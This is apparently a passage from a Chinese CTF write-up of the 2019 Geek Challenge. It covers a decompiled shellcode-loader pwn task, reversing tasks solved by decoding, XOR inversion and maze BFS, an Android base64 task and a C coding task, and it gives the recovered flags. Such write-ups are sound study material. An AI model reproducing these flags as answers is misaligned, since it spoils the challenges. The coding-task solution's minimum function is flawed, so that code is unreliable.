<figure class="highlight c++"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line">__int64 __<span class="function">fastcall <span class="title">main</span><span class="params">(__int64 a1, <span class="keyword">char</span> **a2, <span class="keyword">char</span> **a3)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">  <span class="keyword">char</span> v4; <span class="comment">// [rsp+0h] [rbp-30h]</span></span><br><span class="line">  <span class="keyword">void</span> *buf; <span class="comment">// [rsp+28h] [rbp-8h]</span></span><br><span class="line"></span><br><span class="line">  buf = mmap((<span class="keyword">void</span> *)<span class="number">0x123000</span>, <span class="number">0x1000</span>uLL, <span class="number">6</span>, <span class="number">34</span>, <span class="number">-1</span>, <span class="number">0L</span>L);</span><br><span class="line">  sub_400999(<span class="number">1191936L</span>L, <span class="number">4096L</span>L);</span><br><span class="line">  sub_400956();</span><br><span class="line">  <span class="built_in">puts</span>(<span class="string">"A simple shellcode for U, have fun!"</span>);</span><br><span class="line">  read(<span class="number">0</span>, buf, <span class="number">0x64</span>uLL);</span><br><span class="line">  <span class="built_in">puts</span>(<span class="string">"Why not play CSGO?"</span>);</span><br><span class="line">  read(<span class="number">0</span>, &amp;v4, <span class="number">0x64</span>uLL);</span><br><span class="line">  <span class="keyword">return</span> <span class="number">0L</span>L;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p><code>mmap</code>可以实现内存共享，那么，我们可以将<code>shellcode</code>写入<code>buf</code>里面，</p>
<h1 id="RE"><a href="#RE" class="headerlink" title="RE"></a>RE</h1><h2 id="jiang’s-fan-密码都记错？你个假粉丝！！"><a href="#jiang’s-fan-密码都记错？你个假粉丝！！" class="headerlink" title="jiang’s fan 密码都记错？你个假粉丝！！"></a>jiang’s fan 密码都记错？你个假粉丝！！</h2><p>使用<code>ida</code>打开，找到<code>Syc{I_am_4_fan_of_Ji@ng}</code></p>
<h2 id="secret"><a href="#secret" class="headerlink" title="secret"></a>secret</h2><p>用ida打开，然后发现一行编码：</p>
<p><code>5379637B6E30775F794F755F6B6E6F775F6234736531367D</code></p>
<p>像个加密形式，试着解密，开始使用base64进行解码，发现不行，后来使用hex解码得到<code>Syc{n0w_yOu_know_b4se16}</code></p>
<h2 id="Easy-VB"><a href="#Easy-VB" class="headerlink" title="Easy VB"></a>Easy VB</h2><blockquote>
<p>我的IDA怎么不能F5了,这可怎么办啊? </p>
</blockquote>
<p>file一下</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">Easy VB.exe: PE32 executable (GUI) Intel 80386, <span class="keyword">for</span> MS Windows</span><br></pre></td></tr></table></figure>
<p>用<code>ida</code>打开，发现只有一个函数，</p>
<h2 id="冰菓"><a href="#冰菓" class="headerlink" title="冰菓"></a>冰菓</h2><blockquote>
<p>千反田不小心把重要的东西落在了古典文学社，你能帮她找到吗？ </p>
</blockquote>
<p>点开界面，发现：<br><img src="/2019/10/15/第十届极客大挑战/1571209342577.png" alt="1571209342577"></p>
<p>说点他有惊喜，点几次发现：<br><img src="/2019/10/15/第十届极客大挑战/1571209369313.png" alt="1571209369313"></p>
<p>使用这个工具进行逆向，找到关键加密函数:</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br></pre></td><td class="code"><pre><span class="line">using System;</span><br><span class="line">using System.Text;</span><br><span class="line"></span><br><span class="line">namespace Bingo</span><br><span class="line">&#123;</span><br><span class="line">	// Token: 0x02000006 RID: 6</span><br><span class="line">	public class EncryptStr</span><br><span class="line">	&#123;</span><br><span class="line">		// Token: 0x06000013 RID: 19 RVA: 0x00002424 File Offset: 0x00000624</span><br><span class="line">		public bool CheckStr(string text)</span><br><span class="line">		&#123;</span><br><span class="line">			if (text.Length != 20)</span><br><span class="line">			&#123;</span><br><span class="line">				return false;</span><br><span class="line">			&#125;</span><br><span class="line">			byte[] bytes = Encoding.ASCII.GetBytes(text);</span><br><span class="line">			byte[] array = new byte[]</span><br><span class="line">			&#123;</span><br><span class="line">				119,</span><br><span class="line">				77,</span><br><span class="line">				103,</span><br><span class="line">				79,</span><br><span class="line">				21,</span><br><span class="line">				115,</span><br><span class="line">				133,</span><br><span class="line">				97,</span><br><span class="line">				115,</span><br><span class="line">				87,</span><br><span class="line">				22,</span><br><span class="line">				115,</span><br><span class="line">				103,</span><br><span class="line">				89,</span><br><span class="line">				88,</span><br><span class="line">				93,</span><br><span class="line">				22,</span><br><span class="line">				89,</span><br><span class="line">				119,</span><br><span class="line">				81</span><br><span class="line">			&#125;;</span><br><span class="line">			byte[] array2 = new byte[]</span><br><span class="line">			&#123;</span><br><span class="line">				57,</span><br><span class="line">				13</span><br><span class="line">			&#125;;</span><br><span class="line">			for (int i = 0; i &lt; array.Length; i++)</span><br><span class="line">			&#123;</span><br><span class="line">				bytes[i] = Convert.ToByte((int)((bytes[i] ^ array2[0]) + array2[1]));</span><br><span class="line">				if (bytes[i] != array[i])</span><br><span class="line">				&#123;</span><br><span class="line">					return false;</span><br><span class="line">				&#125;</span><br><span class="line">			&#125;</span><br><span class="line">			return true;</span><br><span class="line">		&#125;</span><br><span class="line">	&#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>将此函数进行逆向就可得到<code>flag</code></p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="meta-keyword">include</span><span class="meta-string">&lt;iostream&gt;</span></span></span><br><span class="line"><span class="keyword">using</span> <span class="keyword">namespace</span> <span class="built_in">std</span>;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">int</span> <span class="title">main</span><span class="params">()</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">	<span class="keyword">int</span> <span class="built_in">array</span>[<span class="number">20</span>] = &#123;<span class="number">119</span>,<span class="number">77</span>,<span class="number">103</span>,<span class="number">79</span>,<span class="number">21</span>,<span class="number">115</span>,<span class="number">133</span>,<span class="number">97</span>,<span class="number">115</span>,<span class="number">87</span>,<span class="number">22</span>,<span class="number">115</span>,<span class="number">103</span>,<span class="number">89</span>,<span class="number">88</span>,<span class="number">93</span>,<span class="number">22</span>,<span class="number">89</span>,<span class="number">119</span>,<span class="number">81</span>&#125;;</span><br><span class="line">	<span class="keyword">int</span> array2[<span class="number">2</span>] = &#123;<span class="number">57</span>,<span class="number">13</span>&#125;;</span><br><span class="line">	</span><br><span class="line">	<span class="keyword">int</span> enc[<span class="number">20</span>];</span><br><span class="line">	<span class="keyword">for</span>(<span class="keyword">int</span> i = <span class="number">0</span> ; i &lt; <span class="number">20</span> ; i++)</span><br><span class="line">	&#123;</span><br><span class="line">		enc[i] = (<span class="built_in">array</span>[i]-array2[<span class="number">1</span>])^array2[<span class="number">0</span>];</span><br><span class="line">	&#125; </span><br><span class="line">	<span class="keyword">for</span>(<span class="keyword">int</span> i = <span class="number">0</span> ; i &lt; <span class="number">20</span> ; i++)</span><br><span class="line">	&#123;</span><br><span class="line">		<span class="built_in">printf</span>(<span class="string">"%c"</span>,enc[i]);</span><br><span class="line">	&#125;</span><br><span class="line">	<span class="built_in">printf</span>(<span class="string">"\n"</span>);</span><br><span class="line">	<span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p><code>flag:Syc{1_Am_s0_curi0uS}</code></p>
<h2 id="PYC是啥子嘛"><a href="#PYC是啥子嘛" class="headerlink" title="PYC是啥子嘛?"></a>PYC是啥子嘛?</h2><blockquote>
<p>听说<code>py</code>不需要逆向，那<code>pyc</code>呢，<code>pyc</code>是什么呢？</p>
</blockquote>
<p>在线工具逆向：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#!/usr/bin/env python</span></span><br><span class="line"><span class="comment"># encoding: utf-8</span></span><br><span class="line"><span class="comment"># 如果觉得不错，可以推荐给你的朋友！http://tool.lu/pyc</span></span><br><span class="line"><span class="keyword">print</span> <span class="string">'This is a maze.'</span></span><br><span class="line"><span class="keyword">print</span> <span class="string">'Python is so easy.'</span></span><br><span class="line"><span class="keyword">print</span> <span class="string">'Plz Input The Shortest Way:'</span></span><br><span class="line">maze = <span class="string">'###########S #@@@@@@##@ #@ ####@ ##@ #@@@ @#@ ##@ ####@#@ ##@ @@@@@#@ #########@ ##E######@ ##@ @@@@@ @ @ ###########'</span></span><br><span class="line">way = raw_input()</span><br><span class="line">len = len(way)</span><br><span class="line">p = <span class="number">11</span></span><br><span class="line"><span class="comment">#$$$$$$</span></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> way:</span><br><span class="line">    <span class="keyword">if</span> i == <span class="string">'&amp;'</span>:</span><br><span class="line">        p -= <span class="number">10</span></span><br><span class="line">    <span class="keyword">if</span> i == <span class="string">'$'</span>:</span><br><span class="line">        p += <span class="number">10</span></span><br><span class="line">    <span class="keyword">if</span> i == <span class="string">'6'</span>:</span><br><span class="line">        p -= <span class="number">1</span></span><br><span class="line">    <span class="keyword">if</span> i == <span class="string">'3'</span>:</span><br><span class="line">        p += <span class="number">1</span></span><br><span class="line">    <span class="keyword">if</span> maze[p] == <span class="string">'#'</span>:</span><br><span class="line">        <span class="keyword">print</span> <span class="string">'Your way is wrong'</span></span><br><span class="line">        exit(<span class="number">0</span>)</span><br><span class="line">        <span class="keyword">break</span></span><br><span class="line">    <span class="keyword">if</span> maze[p] == <span class="string">'@'</span>:</span><br><span class="line">        <span class="keyword">continue</span></span><br><span class="line">    <span class="keyword">if</span> maze[p] == <span class="string">'E'</span>:</span><br><span class="line">        <span class="keyword">print</span> <span class="string">'You do it,your flag is Syc\\&#123;+Your Input+\\&#125;.'</span></span><br><span class="line">        exit(<span class="number">0</span>)</span><br><span class="line">        <span class="keyword">continue</span></span><br><span class="line"><span class="keyword">print</span> <span class="string">'May be something wrong.'</span></span><br></pre></td></tr></table></figure>
<p>逆向脚本如下：</p>
<figure class="highlight c++"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="meta-keyword">include</span><span class="meta-string">&lt;cstdio&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span><span class="meta-string">&lt;cstring&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span><span class="meta-string">&lt;stack&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span><span class="meta-string">&lt;queue&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span><span class="meta-string">&lt;string&gt;</span></span></span><br><span class="line"><span class="keyword">using</span> <span class="keyword">namespace</span> <span class="built_in">std</span>;</span><br><span class="line"></span><br><span class="line"><span class="keyword">char</span> maze[<span class="number">101</span>] = <span class="string">"###########S#@@@@@@##@#@####@##@#@@@@#@##@####@#@##@@@@@@#@#########@##E######@##@@@@@@@@###########"</span>;</span><br><span class="line"><span class="keyword">int</span> dir[<span class="number">4</span>] = &#123; <span class="number">-10</span>,<span class="number">10</span>,<span class="number">1</span>,<span class="number">-1</span> &#125;;</span><br><span class="line"><span class="keyword">int</span> vis[<span class="number">100</span>];</span><br><span class="line"><span class="built_in">queue</span>&lt;<span class="keyword">char</span>&gt; fa;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">bool</span> <span class="title">check</span><span class="params">(<span class="keyword">int</span> x)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">	<span class="keyword">if</span> (x &lt; <span class="number">0</span> || x &gt; <span class="number">99</span>)</span><br><span class="line">		<span class="keyword">return</span> <span class="literal">true</span>;</span><br><span class="line">	<span class="keyword">if</span> (vis[x] == <span class="number">1</span> || maze[x] == <span class="string">'#'</span>)</span><br><span class="line">		<span class="keyword">return</span> <span class="literal">true</span>;</span><br><span class="line">	<span class="keyword">return</span> <span class="literal">false</span>;</span><br><span class="line">&#125;</span><br><span class="line"><span class="function"><span class="keyword">void</span> <span class="title">bfs</span><span class="params">()</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">	<span class="built_in">queue</span>&lt;<span class="keyword">int</span>&gt; q;</span><br><span class="line">	<span class="built_in">memset</span>(vis, <span class="number">0</span>, <span class="keyword">sizeof</span>(vis));</span><br><span class="line">	<span class="keyword">int</span> tm = <span class="number">11</span>;</span><br><span class="line">	q.push(tm);</span><br><span class="line">	vis[tm] = <span class="number">1</span>;</span><br><span class="line"></span><br><span class="line">	<span class="keyword">while</span> (!q.empty())</span><br><span class="line">	&#123;</span><br><span class="line">		<span class="keyword">int</span> tm1 = q.front();</span><br><span class="line">		q.pop();</span><br><span class="line">		<span class="keyword">int</span> fl;</span><br><span class="line">		<span class="keyword">for</span> (<span class="keyword">int</span> i = <span class="number">0</span>; i &lt; <span class="number">4</span>; i++)</span><br><span class="line">		&#123;</span><br><span class="line">			fl = tm1 + dir[i];</span><br><span class="line">			<span class="keyword">if</span> (!check(fl))</span><br><span class="line">			&#123;</span><br><span class="line">				q.push(fl);</span><br><span class="line">				vis[fl] = <span class="number">1</span>;</span><br><span class="line">				<span class="keyword">if</span> (dir[i] == <span class="number">10</span>)</span><br><span class="line">					fa.push(<span class="string">'&amp;'</span>);</span><br><span class="line">				<span class="keyword">else</span> <span class="keyword">if</span> (dir[i] == <span class="number">-10</span>)</span><br><span class="line">					fa.push(<span class="string">'$'</span>);</span><br><span class="line">				<span class="keyword">else</span> <span class="keyword">if</span> (dir[i] == <span class="number">-1</span>)</span><br><span class="line">					fa.push(<span class="string">'6'</span>);</span><br><span class="line">				<span class="keyword">else</span> <span class="keyword">if</span> (dir[i] == <span class="number">1</span>)</span><br><span class="line">					fa.push(<span class="string">'3'</span>);</span><br><span class="line">				<span class="keyword">if</span> (maze[tm1] == <span class="string">'E'</span>)</span><br><span class="line">				&#123;</span><br><span class="line">					<span class="keyword">return</span>;</span><br><span class="line">				&#125;</span><br><span class="line">			&#125;</span><br><span class="line">		&#125;</span><br><span class="line">	&#125;</span><br><span class="line">&#125;</span><br><span class="line"><span class="function"><span class="keyword">int</span> <span class="title">main</span><span class="params">()</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">	bfs();</span><br><span class="line">    <span class="built_in">printf</span>(<span class="string">"key words:"</span>);</span><br><span class="line">	<span class="keyword">while</span> (!fa.empty())</span><br><span class="line">	&#123;</span><br><span class="line">		<span class="built_in">printf</span>(<span class="string">"%c"</span>, fa.front());</span><br><span class="line">		fa.pop();</span><br><span class="line">	&#125;</span><br><span class="line">	<span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>得到字符串<code>$$$$33333&amp;&amp;666&amp;&amp;33333$$$$$$$6666666&amp;</code></p>
<p>所以<code>flag为：Syc{$$$$33333&amp;&amp;666&amp;&amp;33333$$$$$$$6666666&amp;}</code></p>
<h1 id="Andriod"><a href="#Andriod" class="headerlink" title="Andriod"></a>Andriod</h1><h2 id="Sign-in"><a href="#Sign-in" class="headerlink" title="Sign_in"></a>Sign_in</h2><p>用jadx-gui进行反编译：<br><img src="/2019/10/15/第十届极客大挑战/1570889802327.png" alt="1570889802327"></p>
<p>找到关键代码：</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">public</span> <span class="keyword">void</span> <span class="title">onClick</span><span class="params">(View view)</span> </span>&#123;</span><br><span class="line">        <span class="keyword">if</span> (view.getId() != R.id.button) &#123;</span><br><span class="line">            <span class="keyword">return</span>;</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="keyword">if</span> (Base64.encodeToString(<span class="keyword">this</span>.ed.getText().toString().getBytes(), <span class="number">2</span>).equals(getResources().getString(R.string.sign_in)) != <span class="keyword">null</span>) &#123;</span><br><span class="line">            CharSequence charSequence = <span class="string">"Right"</span>;</span><br><span class="line">            <span class="keyword">this</span>.tv.setText(charSequence);</span><br><span class="line">            Toast.makeText(<span class="keyword">this</span>, charSequence, <span class="number">1</span>).show();</span><br><span class="line">            <span class="keyword">return</span>;</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="keyword">this</span>.tv.setText(<span class="string">"Try again"</span>);</span><br><span class="line">        Toast.makeText(<span class="keyword">this</span>, <span class="string">"False"</span>, <span class="number">1</span>).show();</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p><code>getString函数通过id查找字符串,在resource文件查找</code></p>
<p><img src="/2019/10/15/第十届极客大挑战/1571318090417.png" alt="1571318090417"></p>
<p>一段<code>base64码</code>，直接解密：<code>Syc{Si9n_1n_I3_E4sy!}</code></p>
<h1 id="Coding"><a href="#Coding" class="headerlink" title="Coding"></a>Coding</h1><h2 id="Dragon-Quest"><a href="#Dragon-Quest" class="headerlink" title="Dragon Quest"></a>Dragon Quest</h2><blockquote>
<p>按照题目要求编写C语言程序</p>
</blockquote>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br></pre></td><td class="code"><pre><span class="line">Program description:</span><br><span class="line">The brave initially has <span class="number">100</span> HP <span class="keyword">and</span> <span class="number">0</span> LV. He will face <span class="number">3</span> challenges before facing the BOSS. There are three monsters <span class="keyword">for</span> each challenge. The number represents the attack power of the monster. The brave must choose one of them to challenge. Each challenge a monster, the brave will deduct the corresponding HP <span class="keyword">and</span> raise the same number of levels. In order to challenge the BOSS, the LV of the brave must ≥ <span class="number">60</span> <span class="keyword">and</span> keep HP <span class="keyword">as</span> much <span class="keyword">as</span> possible.</span><br><span class="line"></span><br><span class="line">The following conditions:</span><br><span class="line"><span class="number">1.</span> Brave can face BOSS</span><br><span class="line"></span><br><span class="line">    printf(<span class="string">"The brave still has %dHP left to face the BOSS"</span>,HP);</span><br><span class="line"></span><br><span class="line"><span class="number">2.</span> The level of the brave will definitely be less than <span class="number">60</span></span><br><span class="line"></span><br><span class="line">    printf(<span class="string">"why don't give the brave a chance to level up..."</span>);</span><br><span class="line"></span><br><span class="line"><span class="number">3.</span> The brave will definitely <span class="keyword">die</span> on the way to upgrade</span><br><span class="line"></span><br><span class="line">    printf(<span class="string">"The brave died on the way to leveling..."</span>);</span><br><span class="line"></span><br><span class="line"><span class="number">4.</span> The attack power of the monster is less than <span class="keyword">or</span> equal to <span class="number">0.</span>(<span class="keyword">As</span> long <span class="keyword">as</span> the monster attack power is less than <span class="keyword">or</span> equal to <span class="number">0</span>, only this one is output.)</span><br><span class="line"></span><br><span class="line">    printf(<span class="string">"The monster is too weak..."</span>);</span><br><span class="line"></span><br><span class="line">Input1:(Each row represents a challenge)</span><br><span class="line"><span class="number">30</span> <span class="number">90</span> <span class="number">30</span></span><br><span class="line"></span><br><span class="line"><span class="number">50</span> <span class="number">80</span> <span class="number">30</span></span><br><span class="line"></span><br><span class="line"><span class="number">40</span> <span class="number">90</span> <span class="number">20</span></span><br><span class="line"></span><br><span class="line">Output1:</span><br><span class="line">The brave still has <span class="number">20</span>HP left to face the BOSS</span><br><span class="line"></span><br><span class="line">tip:num[<span class="number">0</span>][<span class="number">0</span>]=<span class="number">30</span>--&gt;num[<span class="number">1</span>][<span class="number">2</span>]=<span class="number">30</span>--&gt;num[<span class="number">2</span>][<span class="number">2</span>]=<span class="number">20</span>,LV=<span class="number">30</span>+<span class="number">30</span>+<span class="number">20</span>,HP=<span class="number">100</span><span class="number">-30</span><span class="number">-30</span><span class="number">-20</span></span><br><span class="line"></span><br><span class="line">Input2:(Each row represents a challenge)</span><br><span class="line"><span class="number">100</span> <span class="number">100</span> <span class="number">100</span></span><br><span class="line"></span><br><span class="line"><span class="number">100</span> <span class="number">100</span> <span class="number">100</span></span><br><span class="line"></span><br><span class="line"><span class="number">100</span> <span class="number">100</span> <span class="number">100</span></span><br><span class="line"></span><br><span class="line">Output2:</span><br><span class="line">The brave died on the way to leveling...</span><br><span class="line"></span><br><span class="line">Please input your code:</span><br></pre></td></tr></table></figure>
<p>直接编程就行,注意一定是C语言，C++都不行</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="meta-keyword">include</span><span class="meta-string">&lt;stdio.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span><span class="meta-string">&lt;stdlib.h&gt;</span></span></span><br><span class="line"><span class="keyword">int</span> num[<span class="number">3</span>][<span class="number">3</span>];</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">int</span> <span class="title">finmin</span><span class="params">(<span class="keyword">int</span>* x)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">	<span class="keyword">int</span> min=x[<span class="number">0</span>];</span><br><span class="line">	<span class="keyword">if</span>(min &gt; x[<span class="number">1</span>])</span><br><span class="line">	&#123;</span><br><span class="line">	  	min = x[<span class="number">1</span>];	</span><br><span class="line">	&#125;  </span><br><span class="line">	<span class="keyword">else</span> <span class="keyword">if</span>(min &gt; x[<span class="number">2</span>])</span><br><span class="line">	&#123;</span><br><span class="line">		min = x[<span class="number">2</span>];</span><br><span class="line">	&#125;</span><br><span class="line">	<span class="keyword">return</span> min;</span><br><span class="line">&#125;</span><br><span class="line"><span class="function"><span class="keyword">int</span> <span class="title">main</span><span class="params">()</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">	<span class="built_in">memset</span>(num,<span class="number">0</span>,<span class="keyword">sizeof</span>(num));</span><br><span class="line">	<span class="keyword">for</span>(<span class="keyword">int</span> i = <span class="number">0</span> ; i &lt; <span class="number">3</span> ; i++)</span><br><span class="line">	&#123;</span><br><span class="line">		<span class="keyword">for</span>(<span class="keyword">int</span> j = <span class="number">0</span> ; j &lt; <span class="number">3</span> ; j++)</span><br><span class="line">		&#123;</span><br><span class="line">			<span class="built_in">scanf</span>(<span class="string">"%d"</span>,&amp;num[i][j]);</span><br><span class="line">		&#125;</span><br><span class="line">	&#125;</span><br><span class="line">	<span class="keyword">int</span> level1 = finmin(num[<span class="number">0</span>]);</span><br><span class="line">	<span class="keyword">int</span> level2 = finmin(num[<span class="number">1</span>]);</span><br><span class="line">	<span class="keyword">int</span> level3 = finmin(num[<span class="number">2</span>]);</span><br><span class="line">	<span class="keyword">int</span> hp = <span class="number">100</span>-level1-level2-level3;</span><br><span class="line">	<span class="keyword">int</span> lv = level1+level2+level3;</span><br><span class="line">	</span><br><span class="line">	<span class="keyword">if</span>(level1&lt;= <span class="number">0</span> || level2 &lt;= <span class="number">0</span> || level3 &lt;= <span class="number">0</span>)</span><br><span class="line">	&#123;</span><br><span class="line">		<span class="built_in">printf</span>(<span class="string">"The monster is too weak..."</span>);</span><br><span class="line">		<span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">	&#125;</span><br><span class="line">	<span class="keyword">if</span>(lv &lt; <span class="number">60</span>)</span><br><span class="line">	&#123;</span><br><span class="line">		<span class="built_in">printf</span>(<span class="string">"why don't give the brave a chance to level up..."</span>);</span><br><span class="line">		<span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">	&#125;</span><br><span class="line">	<span class="keyword">if</span>(hp &lt;= <span class="number">0</span>)</span><br><span class="line">	&#123;</span><br><span class="line">		<span class="built_in">printf</span>(<span class="string">"The brave died 